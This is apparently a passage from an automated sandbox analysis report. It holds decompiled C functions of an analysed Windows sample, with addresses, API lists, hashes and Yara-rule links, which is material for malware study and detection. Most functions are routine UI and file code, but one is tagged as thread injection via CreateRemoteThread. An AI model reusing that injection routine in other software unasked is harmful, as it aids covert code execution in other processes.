                                                                                                                0x0040ad2d
                                                                                                                0x0040ad34
                                                                                                                0x0040ad3b
                                                                                                                0x0040ad3e
                                                                                                                0x0040ad44
                                                                                                                0x0040ad48
                                                                                                                0x0040ad4a
                                                                                                                0x0040ad52
                                                                                                                0x0040ad5a
                                                                                                                0x0040ad64
                                                                                                                0x0040ad65
                                                                                                                0x0040ad6b
                                                                                                                0x0040ad6c
                                                                                                                0x0040ad73
                                                                                                                0x0040ad76
                                                                                                                0x0040ad7c
                                                                                                                0x0040ad7c
                                                                                                                0x0040ad7f
                                                                                                                0x0040ad84

                                                                                                                APIs
                                                                                                                • SHGetMalloc.SHELL32(?), ref: 0040AD0C
                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0040AD3E
                                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AD52
                                                                                                                • wcscpy.MSVCRT ref: 0040AD65
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3917621476-0
                                                                                                                • Opcode ID: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                                • Instruction ID: e4c3f7e47c5e56e8be22c5f757262c1ae757d72ab7f138bc7c026954c7aa5c2b
                                                                                                                • Opcode Fuzzy Hash: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                                • Instruction Fuzzy Hash: B011FAB5900208EFDB10EFA9D9889AEB7F8FF48300F10416AE905E7240D738DA05CFA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404A44, Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				long _v8;
				long _v12;
				long _t13;
				void* _t14;
				struct HWND__* _t24;

				_t24 = GetDlgItem(_a4, _a8);
				_t13 = SendMessageW(_t24, 0x146, 0, 0);
				_v12 = _t13;
				_v8 = 0;
				if(_t13 <= 0) {
					L3:
					_t14 = 0;
				} else {
					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
						_v8 = _v8 + 1;
						if(_v8 < _v12) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					SendMessageW(_t24, 0x14e, _v8, 0);
					_t14 = 1;
				}
				L4:
				return _t14;
			}








                                                                                                                0x00404a62
                                                                                                                0x00404a6a
                                                                                                                0x00404a6e
                                                                                                                0x00404a71
                                                                                                                0x00404a74
                                                                                                                0x00404a92
                                                                                                                0x00404a92
                                                                                                                0x00404a76
                                                                                                                0x00404a76
                                                                                                                0x00404a87
                                                                                                                0x00404a90
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00404a90
                                                                                                                0x00404aa3
                                                                                                                0x00404aa7
                                                                                                                0x00404aa7
                                                                                                                0x00404a94
                                                                                                                0x00404a98

                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32 ref: 00404A52
                                                                                                                • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
                                                                                                                • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
                                                                                                                • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Item
                                                                                                                • String ID:
                                                                                                                • API String ID: 3888421826-0
                                                                                                                • Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                                • Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
                                                                                                                • Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                                • Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004072D8, Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E004072D8(void* __ecx, void* __eflags, void* _a4, short* _a8) {
				long _v8;
				void _v8199;
				char _v8200;

				E0040B550(0x2004, __ecx);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}






                                                                                                                0x004072e0
                                                                                                                0x004072f7
                                                                                                                0x004072fd
                                                                                                                0x00407316
                                                                                                                0x00407342

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004072FD
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00407316
                                                                                                                • strlen.MSVCRT ref: 00407328
                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407339
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2754987064-0
                                                                                                                • Opcode ID: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                                • Instruction ID: b20814eff52bbcc052d034fa9df9783175f47b69a9638c3bed99c582471ba408
                                                                                                                • Opcode Fuzzy Hash: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                                • Instruction Fuzzy Hash: E7F0FFB740022CBEEB05A7949DC9DDB776CDB08358F0001B6B715E2192D6749E448BA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00408DC8, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00408DC8(void** __eax, struct HWND__* _a4) {
				int _t7;
				void** _t11;

				_t11 = __eax;
				if( *0x4101b4 == 0) {
					memcpy(0x40f5c8,  *__eax, 0x50);
					memcpy(0x40f2f8,  *(_t11 + 4), 0x2cc);
					 *0x4101b4 = 1;
					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E00408ADB, 0);
					 *0x4101b4 =  *0x4101b4 & 0x00000000;
					 *0x40f2f4 = _t7;
					return 1;
				} else {
					return 1;
				}
			}





                                                                                                                0x00408dd0
                                                                                                                0x00408dd2
                                                                                                                0x00408de2
                                                                                                                0x00408df4
                                                                                                                0x00408e01
                                                                                                                0x00408e1b
                                                                                                                0x00408e21
                                                                                                                0x00408e28
                                                                                                                0x00408e30
                                                                                                                0x00408dd4
                                                                                                                0x00408dd8
                                                                                                                0x00408dd8

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$DialogHandleModuleParam
                                                                                                                • String ID:
                                                                                                                • API String ID: 1386444988-0
                                                                                                                • Opcode ID: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                                • Instruction ID: 2efff09082e6186f10957894d43819ba35d003f4fc085d6afb87634920226402
                                                                                                                • Opcode Fuzzy Hash: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                                • Instruction Fuzzy Hash: FAF08231695310BBD7206BA4BE0AB473AA0D700B16F2484BEF241B54E0C7FA04559BDC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004050E1, Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004050E1(wchar_t* __edi, wchar_t* _a4) {
				int _t10;
				int _t12;
				void* _t23;
				wchar_t* _t24;
				signed int _t25;

				_t24 = __edi;
				_t25 = wcslen(__edi);
				_t10 = wcslen(_a4);
				_t23 = _t10 + _t25;
				if(_t23 >= 0x3ff) {
					_t12 = _t10 - _t23 + 0x3ff;
					if(_t12 > 0) {
						wcsncat(__edi + _t25 * 2, _a4, _t12);
					}
				} else {
					wcscat(__edi + _t25 * 2, _a4);
				}
				return _t24;
			}








                                                                                                                0x004050e1
                                                                                                                0x004050ec
                                                                                                                0x004050ee
                                                                                                                0x004050f5
                                                                                                                0x004050ff
                                                                                                                0x00405114
                                                                                                                0x00405118
                                                                                                                0x00405123
                                                                                                                0x00405128
                                                                                                                0x00405101
                                                                                                                0x00405109
                                                                                                                0x0040510f
                                                                                                                0x0040512e

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: wcslen$wcscatwcsncat
                                                                                                                • String ID:
                                                                                                                • API String ID: 291873006-0
                                                                                                                • Opcode ID: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                                • Instruction ID: d151cadb35ebc04527c95d650d15a6f00d765f1fde14687ca002c1c28d544fc6
                                                                                                                • Opcode Fuzzy Hash: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                                • Instruction Fuzzy Hash: 3CE0EC36908703AECB042625AC45C6F375DEF84368B50843FF410E6192EF3DD51556DD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00402DDD, Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00402DDD(struct HWND__* __eax, void* __ecx) {
				void* __edi;
				void* __esi;
				struct HWND__* _t11;
				struct HWND__* _t14;
				struct HWND__* _t15;
				void* _t16;

				_t14 = __eax;
				_t16 = __ecx;
				 *((intOrPtr*)(__ecx + 0x10)) = __eax;
				GetClientRect(__eax, __ecx + 0xa14);
				 *(_t16 + 0xa24) =  *(_t16 + 0xa24) & 0x00000000;
				_t15 = GetWindow(GetWindow(_t14, 5), 0);
				do {
					E00402D99(_t15, _t16);
					_t11 = GetWindow(_t15, 2);
					_t15 = _t11;
				} while (_t15 != 0);
				return _t11;
			}









                                                                                                                0x00402de0
                                                                                                                0x00402de2
                                                                                                                0x00402dec
                                                                                                                0x00402def
                                                                                                                0x00402dfb
                                                                                                                0x00402e0c
                                                                                                                0x00402e0e
                                                                                                                0x00402e0e
                                                                                                                0x00402e16
                                                                                                                0x00402e18
                                                                                                                0x00402e1a
                                                                                                                0x00402e21

                                                                                                                APIs
                                                                                                                • GetClientRect.USER32 ref: 00402DEF
                                                                                                                • GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                                • GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                                  • Part of subcall function 00402D99: GetWindowRect.USER32 ref: 00402DA8
                                                                                                                  • Part of subcall function 00402D99: MapWindowPoints.USER32 ref: 00402DC3
                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$ClientPoints
                                                                                                                • String ID:
                                                                                                                • API String ID: 4235085887-0
                                                                                                                • Opcode ID: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                                • Instruction ID: 77c271d885eafffee951e9f606c1c6e1ef1898ae553cc6e200c9330dee891b18
                                                                                                                • Opcode Fuzzy Hash: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                                • Instruction Fuzzy Hash: B8E092722407006BE22197398DC9FABB2EC9FC9761F11053EF504E7280DBB8DC014669
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040B6A6, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 72%
                                                                                                                			E0040B6A6() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x41c458;
				if(_t1 != 0) {
					_push(_t1);
					L0040B272();
				}
				_t2 =  *0x41c460;
				if(_t2 != 0) {
					_push(_t2);
					L0040B272();
				}
				_t3 =  *0x41c45c;
				if(_t3 != 0) {
					_push(_t3);
					L0040B272();
				}
				_t4 =  *0x41c464;
				if(_t4 != 0) {
					_push(_t4);
					L0040B272();
					return _t4;
				}
				return _t4;
			}







                                                                                                                0x0040b6a6
                                                                                                                0x0040b6ad
                                                                                                                0x0040b6af
                                                                                                                0x0040b6b0
                                                                                                                0x0040b6b5
                                                                                                                0x0040b6b6
                                                                                                                0x0040b6bd
                                                                                                                0x0040b6bf
                                                                                                                0x0040b6c0
                                                                                                                0x0040b6c5
                                                                                                                0x0040b6c6
                                                                                                                0x0040b6cd
                                                                                                                0x0040b6cf
                                                                                                                0x0040b6d0
                                                                                                                0x0040b6d5
                                                                                                                0x0040b6d6
                                                                                                                0x0040b6dd
                                                                                                                0x0040b6df
                                                                                                                0x0040b6e0
                                                                                                                0x00000000
                                                                                                                0x0040b6e5
                                                                                                                0x0040b6e6

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                • Opcode ID: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                                • Instruction ID: 3bd5cb9a150004800b4bedd87e83f43d671674f7d7a0a5890c52a9af046e0154
                                                                                                                • Opcode Fuzzy Hash: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                                • Instruction Fuzzy Hash: 96E00261B8820196DD249A7AACD5D6B239C9A05794314847EF804E72E5DF39D44045ED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00407362, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00407362(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				wchar_t* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				void* __edi;
				signed int _t39;
				wchar_t* _t41;
				signed int _t45;
				signed int _t48;
				wchar_t* _t53;
				wchar_t* _t62;
				void* _t66;
				intOrPtr* _t68;
				void* _t70;
				wchar_t* _t75;
				wchar_t* _t79;

				_t66 = __ebx;
				_t75 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t39 =  *( *((intOrPtr*)(_t66 + 0x30)) + _v8 * 4);
						_t68 = _a8;
						if(_t68 != _t75) {
							_t79 =  *((intOrPtr*)( *_t68))(_t39,  *((intOrPtr*)(_t66 + 0x60)));
						} else {
							_t79 =  *( *((intOrPtr*)(_t66 + 0x2d4)) + 0x10 + _t39 * 0x14);
						}
						_t41 = wcschr(_t79, 0x2c);
						_pop(_t70);
						if(_t41 != 0) {
							L8:
							_v20 = _t75;
							_v28 = _t75;
							_v36 = _t75;
							_v24 = 0x100;
							_v32 = 1;
							_v16 = 0x22;
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							while(1) {
								_t45 =  *_t79 & 0x0000ffff;
								__eflags = _t45;
								_v12 = _t45;
								_t77 =  &_v36;
								if(__eflags == 0) {
									break;
								}
								__eflags = _t45 - 0x22;
								if(__eflags != 0) {
									_push( &_v12);
									_t48 = 1;
									__eflags = 1;
								} else {
									_push(L"\"\"");
									_t48 = _t45 | 0xffffffff;
								}
								E0040565D(_t48, _t70, _t77, __eflags);
								_t79 =  &(_t79[0]);
								__eflags = _t79;
							}
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							_t53 = _v20;
							__eflags = _t53;
							if(_t53 == 0) {
								_t53 = 0x40c4e8;
							}
							E004055D1(E00407343(_t66, _a4, _t53),  &_v36);
							_t75 = 0;
							__eflags = 0;
						} else {
							_t62 = wcschr(_t79, 0x22);
							_pop(_t70);
							if(_t62 != 0) {
								goto L8;
							} else {
								E00407343(_t66, _a4, _t79);
							}
						}
						if(_v8 <  *((intOrPtr*)(_t66 + 0x2c)) - 1) {
							E00407343(_t66, _a4, ",");
						}
						_v8 = _v8 + 1;
					} while (_v8 <  *((intOrPtr*)(_t66 + 0x2c)));
				}
				return E00407343(_t66, _a4, L"\r\n");
			}























                                                                                                                0x00407362
                                                                                                                0x00407369
                                                                                                                0x0040736e
                                                                                                                0x00407371
                                                                                                                0x00407378
                                                                                                                0x0040737e
                                                                                                                0x00407381
                                                                                                                0x00407386
                                                                                                                0x0040739f
                                                                                                                0x00407388
                                                                                                                0x00407391
                                                                                                                0x00407391
                                                                                                                0x004073a4
                                                                                                                0x004073ac
                                                                                                                0x004073ad
                                                                                                                0x004073cd
                                                                                                                0x004073d0
                                                                                                                0x004073d3
                                                                                                                0x004073d6
                                                                                                                0x004073e0
                                                                                                                0x004073e7
                                                                                                                0x004073ee
                                                                                                                0x004073f5
                                                                                                                0x0040741a
                                                                                                                0x0040741a
                                                                                                                0x0040741d
                                                                                                                0x00407420
                                                                                                                0x00407423
                                                                                                                0x00407426
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004073fc
                                                                                                                0x00407400
                                                                                                                0x0040740f
                                                                                                                0x00407412
                                                                                                                0x00407412
                                                                                                                0x00407402
                                                                                                                0x00407402
                                                                                                                0x00407407
                                                                                                                0x00407407
                                                                                                                0x00407413
                                                                                                                0x00407419
                                                                                                                0x00407419
                                                                                                                0x00407419
                                                                                                                0x0040742f
                                                                                                                0x00407434
                                                                                                                0x00407437
                                                                                                                0x00407439
                                                                                                                0x0040743b
                                                                                                                0x0040743b
                                                                                                                0x0040744e
                                                                                                                0x00407453
                                                                                                                0x00407453
                                                                                                                0x004073af
                                                                                                                0x004073b2
                                                                                                                0x004073ba
                                                                                                                0x004073bb
                                                                                                                0x00000000
                                                                                                                0x004073bd
                                                                                                                0x004073c3
                                                                                                                0x004073c3
                                                                                                                0x004073bb
                                                                                                                0x0040745c
                                                                                                                0x00407468
                                                                                                                0x00407468
                                                                                                                0x0040746d
                                                                                                                0x00407473
                                                                                                                0x0040747c
                                                                                                                0x0040748e

                                                                                                                APIs
                                                                                                                • wcschr.MSVCRT ref: 004073A4
                                                                                                                • wcschr.MSVCRT ref: 004073B2
                                                                                                                  • Part of subcall function 0040565D: wcslen.MSVCRT ref: 00405679
                                                                                                                  • Part of subcall function 0040565D: memcpy.MSVCRT ref: 0040569D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: wcschr$memcpywcslen
                                                                                                                • String ID: "
                                                                                                                • API String ID: 1983396471-123907689
                                                                                                                • Opcode ID: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                                • Instruction ID: 00b3f0686b04e7c82e40785714242b478475f00d1c6093d835cc4068bab83974
                                                                                                                • Opcode Fuzzy Hash: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                                • Instruction Fuzzy Hash: 4E315F31E04208ABDF10EFA5C8819AE7BB9EF54314F20457BEC50B72C2D778AA41DB59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040A272, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70threadinjectionCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 64%
                                                                                                                			E0040A272(struct HINSTANCE__** __eax, void* _a4, _Unknown_base(*)()* _a8, void* _a12, DWORD* _a16) {
				void* _v8;
				char _v12;
				char* _v20;
				long _v24;
				intOrPtr _v28;
				char* _v36;
				signed int _v40;
				void _v44;
				char _v48;
				char _v52;
				struct _OSVERSIONINFOW _v328;
				void* __esi;
				signed int _t40;
				intOrPtr* _t44;
				void* _t49;
				struct HINSTANCE__** _t54;
				signed int _t55;

				_t54 = __eax;
				_v328.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v328);
				if(_v328.dwMajorVersion < 6) {
					return CreateRemoteThread(_a4, 0, 0, _a8, _a12, 4, _a16);
				}
				E0040A1EF(_t54);
				_t44 =  *((intOrPtr*)(_t54 + 4));
				if(_t44 != 0) {
					_t55 = 8;
					memset( &_v44, 0, _t55 << 2);
					_v12 = 0;
					asm("stosd");
					_v36 =  &_v12;
					_v20 =  &_v52;
					_v48 = 0x24;
					_v44 = 0x10003;
					_v40 = _t55;
					_v28 = 0x10004;
					_v24 = 4;
					_a16 = 0;
					_t40 =  *_t44( &_a16, 0x1fffff, 0, _a4, _a8, _a12, 1, 0, 0, 0,  &_v48, _t49);
					asm("sbb eax, eax");
					return  !( ~_t40) & _a16;
				}
				return 0;
			}




















                                                                                                                0x0040a27d
                                                                                                                0x0040a286
                                                                                                                0x0040a290
                                                                                                                0x0040a29d
                                                                                                                0x00000000
                                                                                                                0x0040a32f
                                                                                                                0x0040a29f
                                                                                                                0x0040a2a4
                                                                                                                0x0040a2ad
                                                                                                                0x0040a2b6
                                                                                                                0x0040a2bc
                                                                                                                0x0040a2be
                                                                                                                0x0040a2c4
                                                                                                                0x0040a2c8
                                                                                                                0x0040a2ce
                                                                                                                0x0040a2e3
                                                                                                                0x0040a2ed
                                                                                                                0x0040a2fb
                                                                                                                0x0040a2fe
                                                                                                                0x0040a305
                                                                                                                0x0040a30c
                                                                                                                0x0040a30f
                                                                                                                0x0040a313
                                                                                                                0x00000000
                                                                                                                0x0040a31a
                                                                                                                0x0040a338

                                                                                                                APIs
                                                                                                                • GetVersionExW.KERNEL32(?,74B068A0,00000000), ref: 0040A290
                                                                                                                • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,?), ref: 0040A32F
                                                                                                                  • Part of subcall function 0040A1EF: LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                                  • Part of subcall function 0040A1EF: GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressCreateLibraryLoadProcRemoteThreadVersion
                                                                                                                • String ID: $
                                                                                                                • API String ID: 283512611-3993045852
                                                                                                                • Opcode ID: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                                • Instruction ID: f7bb912936b7b9019fec647a10c74351ea71fc4cb5320a39ef1905a9d188216f
                                                                                                                • Opcode Fuzzy Hash: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                                • Instruction Fuzzy Hash: CC216DB290020DEFDF11CF94DD44AEE7BB9FB88704F00802AFA05B6190D7B59A54CBA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401676, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 45%
                                                                                                                			E00401676(void* __ecx, intOrPtr* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v80;
				signed short _v65616;
				void* _t27;
				intOrPtr _t28;
				void* _t34;
				intOrPtr _t39;
				intOrPtr* _t51;
				void* _t52;

				_t51 = __esi;
				E0040B550(0x1004c, __ecx);
				_t39 = 0;
				_push(0);
				_push( &_v8);
				_v8 =  *((intOrPtr*)(_a4 + 0x1c));
				_push(L"Lines");
				_t27 =  *((intOrPtr*)( *__esi))();
				if(_v8 > 0) {
					do {
						_t6 = _t39 + 1; // 0x1
						_t28 = _t6;
						_push(_t28);
						_push(L"Line%d");
						_v12 = _t28;
						_push(0x1f);
						_push( &_v80);
						L0040B1EC();
						_t52 = _t52 + 0x10;
						_push(0x7fff);
						_push(0x40c4e8);
						if( *((intOrPtr*)(_t51 + 4)) == 0) {
							_v65616 = _v65616 & 0x00000000;
							 *((intOrPtr*)( *_t51 + 0x10))( &_v80,  &_v65616);
							_t34 = E004054DF(_a4, _t51,  &_v65616);
						} else {
							_t34 =  *((intOrPtr*)( *_t51 + 0x10))( &_v80, E00405581(_a4, _t39));
						}
						_t39 = _v12;
					} while (_t39 < _v8);
					return _t34;
				}
				return _t27;
			}













                                                                                                                0x00401676
                                                                                                                0x0040167e
                                                                                                                0x0040168a
                                                                                                                0x0040168c
                                                                                                                0x00401690
                                                                                                                0x00401691
                                                                                                                0x00401696
                                                                                                                0x0040169d
                                                                                                                0x004016a2
                                                                                                                0x004016aa
                                                                                                                0x004016aa
                                                                                                                0x004016aa
                                                                                                                0x004016ad
                                                                                                                0x004016ae
                                                                                                                0x004016b3
                                                                                                                0x004016b9
